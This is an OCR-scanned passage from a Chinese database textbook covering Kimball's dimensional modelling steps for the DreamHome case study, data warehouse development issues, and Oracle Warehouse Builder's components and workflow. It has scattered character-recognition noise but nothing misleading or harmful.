百 张 物理 表 。 所 以 传统 ER 模型 并 不 能 支持 数据 仓库 最 具 吸 引力 的 地 方 ， 即 直观 和 高 效 的 数 
据 检 索 。 

理解 DM 与 ER 模型 之 间 联 系 的 关键 是 ， 一 个 ER 模型 通常 会 分 解 成 多 个 DM。 这 多 个 
DM 又 通过 共享 的 维 表 关 联 到 一 起 。 在 下 一 节 还 要 详细 讨论 ER 模型 与 DM 之 间 的 联系 ， 并 
更 详细 地 考察 Kimball 的 业务 维度 生命 周期 的 维度 建 模 阶段 。 


32.5 ”Kimball 的 业务 维度 生命 周期 的 维度 建 模 阶段 
在 本 节 中 ， 我 们 专注 于 Kimball 业务 维度 生命 周期 ( Kimball，2008 ) 的 维度 建 模 阶段 。 
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这 个 阶段 或 创建 用 于 某 个 数据 集 市 的 维度 模型 ， 或 “维度 化 ” 某 个 OLTP 数据 库 的 关系 
模式 。 

在 本 节 中 ,我们 将 展示 如 何 创建 一 个 扩展 版 的 DreamHome 案例 研究 ( 见 11.4 节 ) 的 维 
度 模 型 。 这 个 阶段 的 输出 是 一 个 可 用 于 构建 数据 集 市 的 详细 维度 模型 ， 该 数据 集 市 能 够 支持 
一 个 特定 用 户 群 的 信息 需求 。 这 个 阶段 首先 定义 一 个 高 层 DM， 逐 渐 丰 富 更 多 的 细节 。 这 通 
过 两 个 阶段 方法 实现 ， 第 一 阶段 是 创建 高 层 DM (维度 建 模 )， 第 二 阶段 通过 识别 模型 的 维度 
属性 向 模型 添加 细节 。 


32.5.1 创建 高 层 维度 模型 (阶段 1) 


阶段 I 使 用 四 步 过 程 创 建 高 层 DM， 如 图 32-4 所 示 。 我 们 以 DreamHome 案例 研究 为 工 
作 实 例 ， 逐 步 检 查 这 四 个 步 又 。 


2 wm 


图 32-4 创建 维度 模型 的 四 步 过 程 


步骤 1: 选择 业务 流程 
业务 流程 涉及 一 个 具体 数据 集 市 的 主体 。 第 一 个 构建 的 数据 集 市 应 该 是 最 可 能 在 预算 内 
按时 交付 的 数据 集 市 ， 并 且 回 答 商 业 上 最 重要 的 业务 问题 。 此 外 ， 第 一 个 数据 集 市 应 通过 创 
建 可 重用 或 一 致 的 维度 (参见 步骤 3 )， 为 企业 视图 建立 数据 基础 。 
第 一 个 数据 集 市 的 最 佳 选 择 往往 是 有 关 销 售 和 财务 的 。 其 数据 源 很 可 能 是 可 访问 且 高 质 
量 的 。 在 选择 DreamHome 的 第 一 个 数据 集 市 时 ， 我 们 首先 确认 DreamHome 的 业务 过 程 包括 : 
房产 销售 。 
房产 租赁 (租借 )。 


®@ @ © 9 
训 
法 


e 房产 维修 。 

与 这 些 过 程 相关 的 数据 需求 显示 在 图 32-5 所 示 的 ER 模型 中 。 注 意 ， 图 中 已 经 通过 标 
记 简 化 了 ER 模型 ， 只 有 实体 和 关系 。 深 色 阴 影 显示 的 是 实体 代表 DreamHome 的 每 个 业务 
流程 的 核心 事实 。 选 择 作 为 第 一 个 数据 集 市 的 业务 流程 是 房产 销售 。 原 始 ER 模型 中 表示 房 
产销 售 业务 流程 的 数据 需求 的 一 部 分 显示 在 图 32-6 中 。 

步骤 2: 声明 粒度 

粒度 级 别 的 选择 是 要 找到 满足 业务 需求 与 什么 可 能 给 出 数据 源 之 间 的 平衡 。 粒 度 决定 事 
实 表 中 记录 表示 什么 。 例 如 ， 图 32-7 中 的 深 色 阴 影 显 示 的 PropertySale 实体 代表 每 处 房产 
销售 的 事实 ， 成 为 前 面 图 32-2 所 示 的 房产 销售 维度 模型 的 事实 表 。 因 此 ，PropertySale 事实 
表 的 粒度 是 单 次 房产 销售 。 建 议 使 用 最 低级 别 的 详细 信息 建立 维度 模型 。 

只 有 当 事 实 表 的 粒度 选 定时 ， 才 能 确定 该 事实 表 的 维度 。 例 如 ， 图 32-7 中 的 Branch、 
Staff、 Owner、ClientBuyer、PropertyForSale 和 Promotion 实体 将 被 用 作 房 产销 售 的 参 引 数据 ， 
从 而 成 为 图 32-2 所 示 房 产销 售 维度 模型 的 维度 表 。 我 们 也 将 时 间作 为 一 个 核心 维度 ， 在 维 
度 模 型 中 它 总 是 存在 。 
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图 32-6 图 32-5 中 表示 DreamHome 房产 销售 业务 流程 的 数据 要 求 的 ER 模型 部 分 


步骤 3: 选择 维度 

维度 设置 了 对 事实 表 中 的 事实 提问 的 上 下 文 。 一 个 精心 设计 的 维度 使 得 维度 模型 实现 为 
数据 集 市 时 易 理解 、 易 使 用 。 我 们 足够 详细 地 确定 维度 ， 以 便 能 以 正确 的 粒度 描述 客户 、 房 
产 等 。 例 如 ，ClientBuyer 维度 表 中 每 个 客户 由 clientID、clientNo、clientName、clientType、 
city、region 和 country 属性 描述 ， 如 图 32-2 中 所 示 。 一 个 呈现 不 好 的 或 不 完整 的 维度 集会 
减少 数据 集 市 对 企业 的 用 途 。 
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符合 的 维 表 
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维 表 


图 32-7 房产 销售 和 地 产 广告 的 维度 模型 ，Time、PropertyForSale、Branch 和 Promotion 
作为 符合 维度 表 


任何 多 于 一 个 维度 的 模型 ， 也 就 是 在 多 于 一 个 数据 集 市 中 出 现 的 维度 被 称 为 符合 的 
(conformed)。 符 合 维 度 要 么 是 同一 个 ， 要么 一 个 是 另 一 个 的 数学 子 集 。 符 合 维度 在 将 单个 
的 数据 集成 为 企业 数据 仓库 方面 发 挥 关键 作用 ， 并 且 支 持 横 钻 查询 。 横 钻 查询 允许 在 同一 个 
查询 中 ， 从 不 同事 实 表 选 取 数 据 一 起 分 析 。 图 32-7 显示 了 房产 销售 和 地 产 广告 的 维度 模型 ， 
浅 色 阴 影 标 出 的 Time、PropertyForSale 、Branch 和 Promotion 为 符合 维度 。 

步骤 4: 识别 事实 

事实 表 的 粒度 决定 哪些 事实 在 维度 模型 中 可 以 使 用 。 所 有 的 事实 必须 在 粒度 所 暗示 的 级 
别 上 表达 。 换 名 话说， 如 果 事 实 表 的 粒度 是 单 次 房产 销售 ， 那 么 所 有 的 数值 事实 必须 均 指 这 
次 具体 的 销售 。 此 外 ， 事 实 应 该 是 数值 型 和 可 累加 的 。 在 图 32-8 中 ,用 DreamHome 的 房产 
租赁 过 程 的 维度 模型 说 明 一 个 结构 不 良 的 事实 表 。 该 事实 表 是 不 可 用 的 ， 因 为 有 非 数值 事实 
( promotionName 和 staffName)、 不 可 累加 事实 ( monthlyRent) 以 及 与 表 中 的 其 他 事实 不 在 
同一 粒度 上 的 事实 (lastYearRevenue)。 图 32-9 显示 了 如 何 修正 图 32-8 中 的 Lease 事实 表 ， 
使 其 结构 适当 。 其 他 事实 可 以 随时 添加 到 事实 表 中 ， 只 要 它们 与 表 的 粒度 一 致 。 阶 段 工 的 四 
个 步骤 完成 后 ， 我 们 进入 Kimball 的 业务 维度 生命 周期 维度 建 模 阶段 的 阶段 I。 
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维 表 维 表 
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clientID {PK} stafflD {PK} 
clientNo 与 其 他 事实 粒度 staffNo 
clientName 不 一 致 的 数值 事实 staffName 
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country 
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图 32-8 ”DreamHome 的 房产 租赁 过 程 的 维度 模型 。 这 是 一 个 结构 不 良 事实 表 的 例子 ， 事实 
表 中 有 非 数值 事实 、 不 可 累加 事实 以 及 与 表 中 的 其 他 事实 粒度 不 一 致 的 数值 事实 


32.5.2 ”确定 维度 模型 的 所 有 维度 属性 ( 阶段 |) 


此 阶段 涉及 添加 这 样 一 些 属 性 ， 它 们 是 在 业务 需求 分 析 阶 段 ， 由 用 户 指出 的 在 分 析 所 选 
定 的 业务 流程 时 必须 用 到 的 那些 属性 。 维 度 模型 的 有 用 性 就 由 维度 表 中 属性 的 范围 和 性 质 决 
定 ， 因 为 这 决定 了 当 数 据 集 市 完成 后 提供 给 用 户 使 用 时 ， 数 据 能 如 何 查看 分 析 。 

在 开发 维度 模型 时 还 需要 考虑 其 他 一 些 问 题 ， 例 如 数据 库 的 持续 时 间 以 及 如 何 处 理 缓慢 
变化 的 维度 。 

选择 数据 库 的 持续 时 间 

持续 时 间 测 定 事实 表 回 溯 多 长 时 间 。 在 许多 企业 ， 要 求 看 一 年 或 两 年 前 同一 时 期 的 情 
况 。 对 于 另 一 些 企 业 ， 例 如 保险 公司 ， 可 能 有 法 律 要 求 保 留 五 年 或 更 长 时 间 的 数据 。 首 先 ， 
非常 大 的 事实 表 至 少 引发 两 个 非常 重要 的 数据 仓库 设计 问题 。 第 一 ， 越 来 越 难 找到 更 旧 的 数 
据 源 。 数 据 越 陈旧 ， 读 取 和 解释 旧 文 件 或 旧 磁带 时 就 越 可 能 出 现 问题 。 第 二 ， 重 要 维度 只 能 
使 用 老 版 本 ， 而 不 是 最 新 的 版 本 。 这 也 被 称 为 “缓慢 变化 的 维度 ”问题 。 

跟踪 缓慢 变化 的 维度 

缓慢 变化 维度 问题 意味 着 ， 比 如 ， 老 客户 和 老 分 公司 本 来 的 描述 必须 与 老 的 事务 历史 一 
起 使 用 。 通 常 ， 数 据 仓库 必须 为 这 些 重要 维度 分 配 一 个 关键 字 ， 以 便 区 分 客户 和 分 公司 在 一 
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段 时 间 内 的 多 个 快照 。 
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维 表 
图 32-9 DreamHome 的 房产 租赁 过 程 的 维度 模型 。 该 模型 为 图 32-8 所 示 模 型 的 纠正 


缓慢 变化 维度 有 三 种 基本 类 型 : 类 型 1， 修 改 的 维度 属性 直接 被 覆盖 掉 ; 类 型 >， 修改 
的 维度 属性 导致 创建 一 个 新 的 维度 记录 ; 类 型 3， 修改 的 维度 属性 导致 创建 一 个 备用 属性 ， 
使 得 在 同一 个 维 记录 中 可 同时 访问 该 属性 的 新 旧 两 个 值 。 

一 旦 维度 模型 被 用 户 签 团 认可， 就 可 继续 执行 业务 维度 生命 周期 的 后 续 步 又 (如 图 32-1 
所 示 )， 实 现 第 一 个 数据 集 市 。 这 个 数据 集 市 将 支持 某 个 具体 业务 流程 的 分 析 ， 比 如 房产 销 
售 ， 它 也 能 容易 地 与 其 他 相关 数据 集 市 集成 ， 最 终 形成 全 企业 的 数据 仓库 。 表 32-2 列 出 
了 与 DreamHome 的 每 个 业务 流程 (步骤 1 识别 出 ) 的 维度 模型 相关 联 的 事实 表 和 维度 表 。 


表 32-2 DreamHome 的 每 个 业务 流程 的 事实 表 和 维度 表 
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通过 使 用 符合 维 可 集成 DreamHome 各 业务 流程 的 维度 模型 。 例 如 ， 如 表 32-2 所 示 ， 所 
有 事实 表 共 享 时 间 和 分 公司 维度 。 一 个 维 模型 若 包含 多 于 一 个 事实 表 ， 这 些 事实 表 又 共享 一 
个 或 多 个 符合 维度 表 ， 则 称 为 事实 星座 ( fact constellation)。DreamHome 企业 数据 仓库 的 维 
度 模型 (事实 星座 ) 如 图 32-10 所 示 。 该 模型 被 简化 为 仅 显 示 事 实 表 和 维度 表 的 名 称 。 注 意 
事实 表 用 深 色 阴 影 示 出 ， 所 有 符合 维度 表 用 浅 色 阴影 显示 。 
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图 32-10 
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32.6 


数据 仓库 开发 的 问题 


EDW 开发 的 许多 问题 与 任何 复杂 软件 系统 的 开发 是 共同 的 ， 比 如 为 项 目 筹备 足够 资源 和 
执行 赞助 。 在 这 一 节 ， 我们 只 列 出 对 开发 EDW 或 数据 集 市 (DM) 特别 重要 的 问题 ,包括 : 


32.7 


选择 企业 数据 仓库 开发 方法 学 ， 比 如 Kimball 的 业务 维度 生命 周期 或 Inmon 的 企业 
信息 工厂 (CIF)。 数 据 仓 库 项 目的 初始 范围 ， 例 如 到 底 是 构建 一 个 EDW 还 是 数据 集 
市 (参见 32.2 节 )， 可 能 有 助 于 确定 哪 种 方法 学 更 合适 。 

确定 EDW/DM 要 支持 的 关键 决策 者 和 他 们 的 分 析 需 求 (参见 32.1 节 )。 分 析 需 求 可 
以 从 常规 报表 到 即席 查询 ， 甚 至 到 更 复杂 的 探索 性 和 预测 性 分 析 。 

确定 数据 仓库 (或 数据 集 市 ) 的 内 部 数据 源 ， 必 要 时 还 包括 外 部 数据 源 ， 并 建立 来 自 
这 些 数 据 源 的 数据 的 质量 (参见 31.2 节 )。 花 在 EDW/DM 项 目 上 的 大 部 分 时 间 用 于 
准备 数据 和 上 传 数据 到 目标 EDW/DM。 

选择 适当 的 提取 、 转 换 和 加 载 (ETL) 工具 及 合适 的 设施 ， 用 于 数据 准备 和 将 数据 从 
源 系 统 上 传 到 目标 系统 (参见 31.3.1 节 )。 如 前 所 述 ， 项 目的 这 个 方面 可 以 是 最 耗 时 
的 ， 因 此 选择 最 合适 的 ETL 工具 将 节省 大 量 的 时 间 和 精力 。 

制定 如 何 管理 仓库 元 数据 的 策略 。 在 任何 数据 库 管 理 中 元 数据 都 起 着 至 关 重 要 的 作 
用 。 仓 库 元 数据 的 数量 和 复杂 性 意味 着 在 DW 项 目 中 尽早 建立 元 数据 策略 很 重要 。 
在 整个 数据 仓库 开发 过 程 中 都 会 生成 元 数据 ， 元 数据 包括 源 到 目标 的 映射 、 数 据 变 
换 ， 以 及 数据 预先 计算 和 聚合 。 当 前 ETL 工具 提供 了 一 系列 元 数据 管理 设施 ， 因 此 
在 考虑 ETL 工具 选择 时 应 该 记 住 这 个 需求 (参见 31.3.1 节 )。 

确定 将 在 DW/DM 中 保存 的 数据 的 重要 特征 ,诸如 存储 的 细节 程度 (粒度 、 从 新 数 
据 最 初创 建 到 进入 DW/DM 经 过 的 时 间 (延迟 )、 数 据 的 年 龄 (持续 时 间 ) 和 数据 沿 
革 (数据 从 其 初始 创建 到 其 到 达 仓 库 发 生 过 什么 ))( 参 见 32.5 节 )。 

确定 数据 库 的 存储 容量 需求 ， 它 必须 满足 初始 加 载 和 后 续 新 数据 的 上 传 。 数 据 仓库 
是 一 个 企业 可 能 需要 管理 的 最 大 的 数据 库 。 存 储 详细 的 历史 数据 对 于 发 现 趋 势 和 模 
式 经 常 是 必要 的 ， 因 此 数据 仓库 会 在 相对 较 短 的 时 间 内 增长 非常 大 。 

确定 数据 刷新 的 需求 。 换 句 话 说， 确定 DW/DM 多 久 补 充 一 次 新 数据 (参见 31.3.1 
节 )。 数 据 仓 库 的 趋势 是 朝 着 支持 实时 (RT) 或 接近 实时 (NRT) 数据 分 析 发 展 ， 这 
对 ETL 过 程 提出 了 另外 的 要 求 ， 即 新 数据 一 经 运营 系统 创建 要 尽快 上 传 到 仓库 中 
(参见 32.1.6 节 )。 

找 出 能 支持 决策 者 信息 需求 的 分 析 工 具 。 仓 库 的 真正 价值 不 在 于 存储 的 数据 ， 而 是 通过 
使 用 分 析 工 具 ， 如 OLAP 和 数据 挖掘 等 ， 使 数据 对 用 户 有 用 (参见 第 33 和 34 章 )。 
为 DW/DM 环境 建立 适当 的 结构 以 确保 用 户 可 以 在 他 们 想 要 的 时 间 和 地 点 访问 系统 
(参见 31.2 节 )。 

制定 适当 的 政策 和 过 程 ， 谨 慎 地 处 理 与 数据 所 有 权 相 关 的 组 织 、 文 化 和 政治 问题 ， 
无 论 它们 是 真实 的 还 是 感知 的 。 


使 用 Oracle 设计 数据 仓库 


本 节 将 描述 的 Oracle Warehouse Builder ( OWB) 是 Oracle 数据 仓库 解决 方案 的 关键 组 
件 ， 用 于 设计 和 配置 数据 仓库 、 数 据 集 市 和 电子 商务 智能 应 用 。OWB 是 一 个 设计 和 ETL 工 
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有 具 。 从 顾客 的 观点 来 看 ，OWB 的 一 个 重要 之 处 是 它 允 许 将 所 有 传统 的 数据 仓库 环境 与 新 的 
电子 商务 环境 集成 在 一 起 。 本 节 首 先 概述 一 下 OWB 的 主要 组 件 及 基本 技术 ， 然 后 描述 用 户 
如 何 运 用 OWB 来 完成 数据 仓库 的 典型 任务 。 


32.7.1 


Oracle Warehouse Builder 组 件 


OWB 提供 了 以 下 主要 的 功能 组 件 : 


存储 池 ( repository) : 它 由 Oracle 数据 库 中 的 一 系列 表 组 成 ， 通 过 基于 Java 的 访问 
层 来 访问 。 该 存储 池 基 于 通用 数据 仓库 模型 (Common Warehouse Model，CWM) 标 
准 ， 人 允许 所 有 支持 这 个 标准 的 其 他 产品 访问 OWB 元 数据 (参见 31.3.3 节 )。 

图 形 用 户 接 口 (Graphical User Interface，GUI) : 它 提供 访问 存储 池 的 功能 。 该 GUI 
配置 了 图 形 编辑 器 和 一 个 扩展 使 用 向 导 。 该 GUI 用 Java 编写 ， 使 得 前 端 可 移植 。 
代码 生成 器 ( code generator) : 它 也 用 Java 实现 ， 产 生 能 部 署 数 据 仓 库 的 代码 。OWB 
产生 的 不 同 代码 类 型 将 在 本 节 稍 后 讨论 。 

集成 器 ( integrators) : 这 个 组 件 主要 用 来 从 特定 类 型 的 数据 源 中 提取 数据 。 除 了 支持 
Oracle 本 身 外 ， 它 还 支持 其 他 关系 型 的 、 非 关系 型 的 和 平板 文件 等 数据 源 ，OWB 集成 
器 还 允许 访问 企业 资源 规划 ( ERP) 应 用 ， 如 Oracle 和 SAP R/3 中 的 信息 。SAP 集 
成 器 能 使 用 OWB 产生 的 PL/SQL 代码 来 访问 SAP 透明 表 。 

开放 接口 (open interface) : 它 允 许 开发 者 扩展 OWB 的 数据 提取 能 力 ， 以 充分 利用 
OWB 框架 。 该 开放 接口 作为 OWB 软件 开发 包 ( Software Development Kit，SDK) 的 
一 部 分 供 开 发 者 使 用 。 

Runtime : 这 是 安装 在 目标 模式 下 的 一 系列 表 、 序 列 、 包 和 触发 器 。 数 据 库 对 象 是 
OWB 审计 和 错误 检测 / 更 正 能 力 的 基础 。 例 如 ， 加 载 可 以 通过 存储 在 运行 时 表 中 的 信 
息 重 新 开始 。OWB 包含 一 个 运行 时 审计 查看 器 来 浏览 运行 时 表 和 运行 时 报告 。 


Oracle Warehouse Builder 的 体系 结构 如 图 32-11 所 示 ，Oracle Warehouse Builder 是 大 型 
Oracle 数据 仓库 的 关键 组 件 。 在 数据 仓库 内 必须 与 OWB 协同 工作 的 其 他 一 些 产品 包括 : 


Oracle 一 一 OWB 的 引擎 (没有 外 部 服务 器 时 )。 

Oracle 企业 管理 器 一 一 用 于 调度 。 

Oracle Workflow 一 一 用 于 依赖 管理 。 

Oracle Pure . Extract 一 一 用 于 MVS 主机 访问 。 

Oracle Pure : Integrate 一 一 用 于 顾客 数据 质量 管理 。 
Oracle Gateways 一 一 用 于 关系 型 和 大 型 机 的 数据 访问 。 





图 32-11 Oracle Warehouse Builder 体系 结构 
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32.7.2 使 用 Oracle Warehouse Builder 


本 节 将 介绍 OWB 怎样 协助 用 户 完成 典型 的 数据 仓库 任务 ， 如 定义 源 数据 结构 、 设 计 目标 
数据 仓库 、 将 源 映射 到 目标 、 生 成 代码 、 初 始 化 数据 仓库 、 抽 取 数 据 、 维 护 数 据 仓库 等 。 

定义 源 

一 旦 需求 确定 ， 所 有 数据 源 找到 后 ， 就 可 以 使 用 像 OWB 这 样 的 工具 来 构建 数据 仓库 。 
OWB 可 以 通过 集成 器 来 处 理 不 同 的 数据 源 。OWB 也 使 用 模块 的 概念 ， 即 相关 对 象 的 逻辑 
分 组 。 有 两 种 类 型 的 模块 : 数据 源 和 数据 仓库 。 例 如 ， 一 个 数据 源 模块 可 能 包含 作为 数据 仓 
库 数 据 源 的 OLTP 系统 中 所 有 表 的 定义 。 而 一 个 数据 仓库 类 型 的 模块 可 能 包含 组 成 数据 仓库 
的 事实 表 、 维 表 和 阶段 表 的 定义 。 另 外 ， 重 要 的 是 ， 注 意 模块 里 只 包含 定义 ， 即 只 包含 关于 
数据 源 或 数据 仓库 的 元 数据 ， 而 不 是 那些 可 以 被 查询 或 使 用 的 对 象 。 用 户 可 以 找 适合 数据 源 
的 集成 器 ， 每 个 集成 器 访问 一 个 数据 源 并 导 人 描述 该 数据 源 的 元 数据 。 

Oracle 数据 源 为 了 连接 一 个 Oracle 数据 库 ， 用 户 首先 要 为 Oracle 数据 库 选 择 集成 
器 。 然 后 ， 再 提供 一 些 更 加 详细 的 连接 信息 ， 例 如 ， 用 户 名 、 密 码 ，SQL*Net 连接 字符 串 。 
这 些 信息 可 以 用 来 定义 与 宿主 OWB 存储 池 数 据 库 的 一 个 连接 。OWB 使 用 这 个 数据 库 连 接 
来 查询 源 数 据 的 系统 目录 ， 并 提取 用 于 描述 用 户 感 兴趣 的 表 和 视图 的 元 数据 。 用 户 通过 这 样 
一 个 可 视 化 的 过 程 ， 审 查 数据 源 并 选择 感 兴趣 的 对 象 。 

非 Oracle 数据 源 ”对 非 Oracle 数据 库 的 访问 可 参照 对 Oracle 数据 库 的 访问 。Oracle 的 
透明 网 关 技 术 使 其 成 为 可 能 。 从 本 质 上 来 说 ， 一 个 透明 网 关 人 允许 像 对 待 Oracle 数据 库 一 样 
对 待 其 他 非 Oracle 数据 库 。 在 SQL 层 ， 一 旦 一 个 指向 非 Oracle 数据 库 的 数据 库 连 接 被 定 
义 ， 该 非 Oracle 数据 库 就 能 像 Oracle 数据 库 那 样 使 用 SELECT 语句 进行 查询 。 在 OWB 中 ， 
用 户 要 做 的 就 是 指定 数据 库 的 类 型 ， 这 样 OWB 就 可 以 为 该 数据 库 连 接 定义 选择 合适 的 透明 
网 关 。 在 MVS 大 型 机 数据 源 的 情况 下 ，OWB 和 Oracle Pure . Extract 能 够 从 IMS 、DB2、 
VSAM 中 提取 数据 。 而 且 ，Oracle Pure : Extract 正 计 划 最 终 集成 到 OWB 技术 体系 中 。 

平板 文件 Oracle 支持 两 种 平板 文件 (flat file) : 字符 定 界 文件 和 固定 长 度 文件 。 如 果 
数据 源 是 平板 文件 ， 用 户 需 要 选择 平板 文件 的 集成 器 并 指明 路 径 及 文件 名 。 创 建 描述 这 种 文 
件 的 元 数据 的 过 程 不 同 于 用 于 数据 库 表 的 过 程 。 对 于 表 ， 数 据 库 自身 存储 了 关于 表 的 大 量 信 
息 ， 如 表 名 、 列 名 和 数据 类 型 。 这 些 信息 能 从 目录 中 方便 地 查询 到 。 但 对 于 一 个 文件 ,用户 
必须 协助 创建 它 的 元 数据 ， 可 能 还 要 伴随 由 OWB 提供 的 一 些 智能 猜测 。 在 OWB 中 ， 这 个 
过 程 被 称 为 抽样 (sampling ) 。 

Web 数据 随 着 Internet 的 逐步 渗透 ， 数 据 仓库 的 新 挑战 是 从 Web 站 点 上 捕获 数据 。 
在 电子 商务 环境 下 有 多 种 类 型 的 数据 : 存放 在 基本 数据 库 中 的 事务 型 Web 数据 ; 存储 在 
Web 服务 器 的 日 志文 件 中 的 点 击 流 数据 ; 数据 库 或 日 志文 件 中 的 注册 数据 ; Web 分 析 工具 的 
日 志文 件 中 的 整理 过 的 点 击 流 数据 。OWB 能 用 它 内 置 访问 数据 库 和 平板 文件 的 机 制 处 理 所 
有 这 些 数据 源 。 

数据 质量 OWB 使 用 Oracle Pure: Integrate 解决 数据 质量 的 问题 。Oracle Pure : Integrate 
是 一 个 顾客 数据 集成 软件 ， 它 可 以 自动 创建 统一 的 顾客 与 相关 业务 数据 的 概述 文件 ， 从 而 支 
持 电 子 商务 和 顾客 关系 管理 应 用 。Pure : Integrate 通过 提供 专门 设计 的 高 级 数据 转换 和 整理 
功能 来 完善 OWB 以 满足 数据 库 应 用 需要 。 这 些 功能 包括 : 

。 集成 的 名 字 与 地 址 处 理 ， 用 于 标准 化 、 更 正和 增强 顾客 名 字 与 位 置 的 表示 。 
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e 高 级 随机 匹配 ， 用 于 确定 唯一 的 客户 、 业 务 、 家 庭 、 超 级 家 庭 或 者 是 其 他 没有 通用 
标识 符 的 实体 。 
e 基于 规则 的 强 归 并 : 用 来 解决 数据 冲突 问题 ， 并 由 匹配 数据 创建 最 好 可 能 的 集成 结果 。 
设计 目标 数据 仓库 
一 旦 源 系统 被 找到 并 定义 好 ， 下 一 步 就 是 基于 用 户 需 求 设计 目标 数据 仓库 。 最 常用 的 一 
种 数据 仓库 设计 方法 就 是 星 形 模式 及 其 变形 ,参见 32.4 节 的 讨论 。 许 多 商务 智能 工具 (如 
Oracle Discoverer) 被 优化 用 于 这 类 设计 。OWB 支持 所 有 星 形 模式 变形 的 设计 ， 它 提供 向 导 
和 事实 表 与 维 表 的 图 形 编辑 器 。 例 如 ， 在 维 编辑 器 中 用 户 可 以 图 形 化 地 定义 属性 、 层 和 维度 
的 层次 结构 。 
将 源 映射 到 目标 
当 源 和 目标 都 已 经 很 好 地 定义 之 后 ， 下 一 步 就 是 给 二 者 建立 映射 关系 。 要 注意 存在 两 种 
类 型 的 模块 : 源 模块 和 数据 仓库 模块 。 在 不 同 的 映射 中 ,模块 可 以 重用 很 多 次 。 数 据 仓库 模 
块 本 身 又 可 以 作为 源 模 块 。 例 如 在 这 样 一 种 体系 结构 中 ， 一 个 OLTP 数据 库 给 一 个 中 央 数 据 
仓库 输送 数据 ， 而 这 个 数据 仓库 同时 又 给 数据 集 市 输送 数据 。 此 时 ， 这 个 数据 仓库 既是 目标 
(从 OLTP 数据 库 的 角度 看 ) 又 是 源 〈 从 数据 集 市 的 角度 来 看 )。 
OWB 的 映射 被 定义 为 两 级 : 高 层 映 射 (high-level mapping) 指 源 与 目标 模块 之 间 的 映 
射 ; 低 一 级 的 映射 是 细节 映射 ( detail mapping)， 它 允许 用 户 将 源 中 的 列 映射 到 目标 中 的 列 ， 
并 定义 变换 。OWB 提供 一 个 内 置 的 变换 库 ， 用 户 可 从 中 选择 预定 义 的 变换 。 当 然 ， 用 户 也 
可 以 用 PL/SQL 或 Java 来 定义 自己 的 变换 。 
生成 代码 
代码 生成 器 是 OWB 的 组 件 ， 它 读 目标 定义 和 源 到 目标 的 映射 信息 并 产生 代码 来 实现 数 
据 仓 库 。 生 成 代码 的 类 型 随 用 户 想 要 实现 的 对 象 的 类 型 变化 。 
逻辑 设计 与 物理 设计 在 代码 生成 之 前 ， 用 户主 要 工作 在 逻辑 层 ， 即 对 象 定义 层 。 在 这 
一 层 上 ， 用 户主 要 考虑 捕获 对 象 的 所 有 细节 与 联系 (语义 )， 极 少 考虑 定义 任何 实现 的 特性 。 
以 在 Oracle 数据 库 中 实现 一 个 表 为 例 。 在 逻辑 层 上 ， 用 户 可 能 要 考虑 的 问题 是 表 名 、 列 的 
数目 、 列 名 和 数据 类 型 ， 还 有 这 个 表 与 其 他 表 之 间 的 联系 。 然 而 ， 在 物理 层 上 问题 变 成 : 这 
个 表 在 Oracle 数据 库 中 如 何 能 最 优 地 实现 ? 用 户 此 时 就 必须 考虑 表 空 间 、 索 引 和 存储 参数 
这 些 事 。OWB 允许 用 户 同 时 在 逻辑 层 和 物理 层 上 查看 和 操作 对 象 。 逻 辑 定 义 和 物 理 实 现 细 
节 会 自动 同步 。 
配置 在 OWB 中 ,给 对 象 赋值 物理 特性 的 过 程 称 为 配置 ( configuration)。 能 定义 的 具 
体 特 性 根据 要 配置 的 对 象 而 定 。 这 些 对 象 包括 存储 参数 、 索 引 、 表 空间 和 分 区 。 
确认 在 代码 生成 前 先 检查 对 象 定义 的 完整 性 和 一 致 性 是 一 种 好 的 行为 。OWB 提供 了 
一 个 验证 工具 ， 自 动 完成 这 一 过 程 。 由 这 个 验证 过 程 可 检测 的 错误 包括 源 与 目标 的 数据 类 型 
不 匹配 、 外 部 关键 字 错 等 。 
生成 ”下面 是 OWB 生成 的 一 些 主要 代码 类 型 : 
e SQL 数据 定义 语言 (DDL) 命令 : 一 个 带 有 事实 表 和 维 表 定 义 的 数据 仓库 模块 ， 在 
Oracle 数据 库 中 实现 为 一 个 关系 模式 。OWB 会 生成 SQL DDL 脚本 来 创建 这 个 模式 。 
这 些 脚本 在 OWB 中 被 执行 ， 或 先 存储 在 文件 系统 中 以 后 通过 手动 执行 。 
e PL/SQL 程序 : 只 要 源 是 数据 库 ， 不 管 是 否 是 Oracle， 源 到 目标 的 映射 都 产生 一 个 
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PL/SQL 程序 。 该 PL/SQL 程序 通过 数据 库 连 接 来 访问 源 数据 库 ， 执 行 映射 中 所 定义 
的 变换 ， 并 将 数据 装载 到 目标 表 中 。 
e@ SQL*Loader 控制 文件 : 如 果 映 射 中 的 源 是 一 个 平板 文件 ，OWB 产生 一 个 控制 文件 
与 SQL*Loader 一 道 使 用 。 
e Tcl 肢 本 : OWB 也 产生 Tel 脚本 。 这 些 脚 本 能 用 于 调度 PL/SQL 和 SQL*Loader 映射 
为 Oracle 企业 管理 器 中 的 作业 例如 定期 刷新 数据 仓库 。 
初始 化 数据 仓库 并 提取 数据 

在 将 数据 从 源 移 人 目标 数据 库 之 前 ， 开 发 者 首先 要 初始 化 数据 仓库 ， 换 句 话 说， 就 是 执 
行 所 产生 的 DDL 脚本 ， 创 建 目 标 模式 。OWB 称 此 步骤 为 部 署 ( deployment)。 一 旦 目标 模 
式 到 位 ，PL/SQL 程序 就 可 以 将 数据 从 源 移 到 目标 中 。 注 意 ， 基 本 的 数据 移动 机 制 是 带 数据 
库 连接 的 INSERT...SELECT...。 如 果 出 现 了 任何 错误 ， 一 个 来 自 OWB 的 运行 包 的 例 程 会 在 
审计 表 中 记录 这 个 错误 。 
维护 数据 仓库 

一 旦 数据 仓库 初始 化 完毕 且 初 次 加 载 完成 ， 就 必须 对 其 进行 维护 。 例 如 ， 事 实 表 必须 定 
期 刷新 ， 这 样 查询 才能 返回 最 新 的 结果 。 维 度 表 也 要 扩展 和 更 新 ， 只 是 频率 上 不 及 事实 表 。 
一 个 缓慢 变化 维 的 例子 是 Customer 表 ， 客 户 地 址 、 婚 姻 状况 或 名 字 可 能 随 着 时 间 全 会 改变 。 
除了 INSERT 外 ，OWB 还 支持 以 下 操作 数据 仓库 的 方式 : 

e UPDATE 

e DELETE 

e INSERT/UPDATE (插入 一 行 ; 如果 它 已 经 存在 ， 更 新 它 ) 

e UPDATE/INSERT (更 新 一 行 ; 如 果 它 不 存在 ， 插 入 它 ) 

这 些 特性 给 了 OWB 用 户 各 种 各 样 的 工具 来 维护 数据 仓库 。OWB 与 Oracle 企业 管理 器 
